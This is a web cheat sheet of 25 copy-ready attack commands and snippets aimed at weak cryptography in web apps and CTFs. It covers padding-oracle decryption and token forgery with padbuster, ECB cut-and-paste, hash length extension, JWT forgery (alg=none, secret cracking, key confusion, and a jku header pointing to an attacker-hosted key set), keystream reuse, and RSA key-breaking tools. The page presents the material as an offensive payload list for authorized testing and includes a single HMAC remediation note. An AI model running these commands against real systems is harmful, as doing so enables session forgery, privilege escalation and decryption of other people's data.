Cryptography Attacks Cheat Sheet

Copy-ready commands and techniques for exploiting weak cryptography in web apps and CTFs during authorized testing. (25 payloads)

Try it interactively with the Cipher Decoder

CBC Padding Oracle & Block Cipher Modes

(6)

padbuster http://target/page "$ENC_COOKIE" 16 -cookies "session=$ENC_COOKIE"

Decrypt a CBC ciphertext via a PKCS#7 padding oracle when the server reveals padding-validity differences. Block size 16 = AES; use 8 for DES/3DES.Distinguishable padding-error vs decryption-error responses

padbuster http://target/page "$ENC" 16 -cookies "session=$ENC" -plaintext "user=admin&role=admin"

Forge a brand-new valid CBC ciphertext that decrypts to attacker-chosen plaintext using the same padding oracle (-plaintext / -encoding as needed).Privilege escalation by crafting authenticated-looking tokens

C'[i] = C[i] XOR P[i] XOR P'[i] (CBC bit-flip on preceding block)

CBC bit-flipping: flip bytes in ciphertext block i-1 to control plaintext byte i, since P[i] = D(C[i]) XOR C[i-1]. Corrupts block i-1 as a side effect.Tamper a known field (e.g. admin=0 -> admin=1) without the key

blocks = [ct[i:i+16] for i in range(0,len(ct),16)] # then swap/duplicate blocks

ECB block shuffling: identical 16-byte plaintext blocks produce identical ciphertext blocks, so blocks can be rearranged, duplicated, or spliced between messages.ECB mode (no IV chaining) — reorder fields to escalate

payload = 'A'*16 + 'admin' + '\x0b'*11 # align target value to a block boundary

ECB cut-and-paste: pad input so a desired plaintext block (e.g. "admin" + valid padding) lands in its own block, then graft that ciphertext block into a victim token.Encryption oracle that encrypts attacker-prefixed input under ECB

for b in range(256): send(prefix + bytes([b])); detect repeated ciphertext block

ECB byte-at-a-time decryption: align an unknown secret one byte short of a block boundary and brute-force the final byte by matching ciphertext blocks.ECB oracle of form Enc(attacker_input || secret)

Hash Length Extension

(4)

hash_extender --data "$ORIG_DATA" --secret 16 --append "&admin=true" --signature $KNOWN_MAC --format sha256

Compute a valid MAC for original_data||padding||append without knowing the secret, exploiting H(secret||message) constructions (MD5/SHA-1/SHA-256/SHA-512).Server validates with MAC = H(secret || data); --secret is key length

hashpump -s $KNOWN_SIG -d "$ORIG_DATA" -a "&admin=true" -k 16

hashpump alternative for length-extension: -s known signature, -d known data, -a data to append, -k secret-key length; outputs new hash + new message.Try multiple key lengths (-k 8..64) when secret size unknown

glue = orig_data + md5_padding(len(secret)+len(orig_data)) + append

Manual glue padding: append the Merkle-Damgard padding (0x80, zeros, 64-bit length) for the original (secret+data) length, then resume the hash state from the known digest.Understand why HMAC and SHA-3/keyed-BLAKE2 resist this

Fix: use HMAC-SHA256(key, msg) instead of H(key||msg)

Defensive note for reports: HMAC's nested construction is not vulnerable to length extension; flag any custom H(secret||data) MAC as a finding.Remediation guidance for the engagement

JWT Attacks

(5)

{"alg":"none","typ":"JWT"} -> base64url(header) + "." + base64url(payload) + "."

alg=none attack: set algorithm to none and drop the signature (keep trailing dot) to forge tokens if the server accepts unsigned JWTs. Try None/NONE/nOnE case variants.Libraries that don't enforce an expected algorithm

hashcat -a 0 -m 16500 jwt.txt wordlist.txt

Brute-force a weak HMAC (HS256) signing secret offline. Mode 16500 = JWT. Crack the key, then re-sign arbitrary payloads.HS256 tokens with guessable/short secrets

jwt_tool $JWT -C -d wordlist.txt # then jwt_tool $JWT -S hs256 -p "secret"

jwt_tool to dictionary-crack the secret (-C -d) and re-sign a tampered payload (-S hs256 -p key). Also has -X for known exploits.All-in-one JWT auditing

jwt_tool $JWT -X k -pk public.pem (RS256 -> HS256 confusion)

Algorithm-confusion (key confusion): re-sign an RS256 token as HS256 using the server's RSA PUBLIC key as the HMAC secret, exploiting a shared verify() that picks alg from the header.Server uses one verify call for both RSA and HMAC; public key obtainable

{"alg":"HS256","jwk":{...}} or {"kid":"../../dev/null"} / {"jku":"https://attacker/jwks.json"}

Header-injection tricks: jwk embeds attacker key, jku points verification to an attacker-hosted JWKS, kid path-traversal/SQLi steers the key lookup to a known value.Servers that trust header-supplied key material/locations

XOR & Stream Cipher / Known-Plaintext

(4)

key = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

Single/repeating-XOR recovery: if any plaintext is known (e.g. a fixed header), XOR it with the matching ciphertext bytes to recover the keystream/key at those positions.XOR cipher or stream cipher with known structure

C1 XOR C2 = P1 XOR P2 (two-time pad / keystream reuse)

Nonce/keystream reuse: when two messages use the same stream-cipher keystream, XORing the ciphertexts cancels it, exposing P1 XOR P2 for crib-dragging.AES-CTR/ChaCha/RC4 with a repeated nonce or static key

best_key = max(range(256), key=lambda k: english_score(bytes(b^k for b in ct)))

Single-byte XOR brute force: try all 256 keys and score each candidate plaintext (letter frequency / printable ratio) to find the key. Core CTF primitive.Short repeating-key XOR after keysize is found via Hamming distance

P[i] = C[i] XOR keystream[i % len(keystream)] # crib-drag guessed words

Crib dragging: slide a likely word across P1 XOR P2 at every offset; a guess in one message reveals the aligned bytes of the other, then extend iteratively.Recovering both plaintexts from keystream reuse

RSA Attacks

(6)

m = gmpy2.iroot(c, e)[0] # when c < n and m^e < n (no padding, small e)

Small-e / no-padding: if the message raised to e never wraps the modulus, the ciphertext is a perfect e-th power, so plaintext = integer e-th root of c.Textbook RSA with e=3 and short messages

Hastad: CRT-combine c1,c2,c3 (same m, e=3, distinct n) then iroot(_, 3)

Hastad's broadcast attack: the same message encrypted to e recipients (e small, coprime moduli) is recoverable via CRT to get m^e mod (n1*n2*n3), then an exact e-th root.Same unpadded plaintext sent under e different public keys

g=gcd(e1,e2); s=egcd(e1,e2); m = (pow(c1,a,n)*pow(c2,b,n)) % n for a*e1+b*e2=1

Common-modulus attack: same n, two coprime exponents e1,e2 on the same plaintext. Use the extended Euclidean coefficients to combine c1,c2 and recover m without factoring.One modulus reused with different public exponents

RsaCtfTool --publickey key.pub --uncipherfile cipher.bin --attack wiener

Wiener's attack: recovers a small private exponent d (roughly d < n^0.25) via continued-fraction approximation of e/n, then factors n. Common when d was chosen tiny for speed.Suspiciously large public exponent e (a sign of small d)

RsaCtfTool --publickey *.pub --private --attack all

Throw all known attacks (factordb, Fermat, Pollard, Wiener, common-factor, Boneh-Durfee, etc.) at one or many public keys and emit a private key when one succeeds.Unknown weakness — let the tool fingerprint it

p = gcd(n1, n2) then q = n1 // p; d = inverse(e, (p-1)*(q-1))

Shared-prime / batch-GCD: if two moduli share a prime (weak RNG), their GCD reveals it instantly, fully breaking both keys. Fermat factoring works when p,q are close.Many keys from poor entropy — scale with batchgcd

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Cheat Sheets

JWT Attacks Cheat Sheet Hashcat Password Cracking Cheatsheet

Frequently asked questions

What is the Cryptography Attacks Cheat Sheet?+

It's a quick-reference collection of 25 Crypto Attacks payloads for testing Cryptography Attacks vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these Crypto Attacks payloads?+

Copy any payload straight into your authorized test, or use the Cipher Decoder to apply them interactively. Only test systems you have explicit permission to assess.

Are these Crypto Attacks payloads free to use?+

Yes — this cheat sheet and all Crypto Attacks payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the Cryptography Attacks Cheat Sheet?+

How do I use these Crypto Attacks payloads?+

Copy any payload straight into your authorized test, or use the Cipher Decoder to apply them interactively. Only test systems you have explicit permission to assess.

Are these Crypto Attacks payloads free to use?+

Yes — this cheat sheet and all Crypto Attacks payloads are completely free, with no account required. Everything runs in your browser.

Cryptography Attacks Cheat Sheet

CBC Padding Oracle & Block Cipher Modes

Hash Length Extension

JWT Attacks

XOR & Stream Cipher / Known-Plaintext

RSA Attacks

Related Tools

Related Cheat Sheets

Frequently asked questions

Cryptography Attacks Cheat Sheet

CBC Padding Oracle & Block Cipher Modes

Hash Length Extension

JWT Attacks

XOR & Stream Cipher / Known-Plaintext

RSA Attacks

Related Tools

Related Cheat Sheets

Frequently asked questions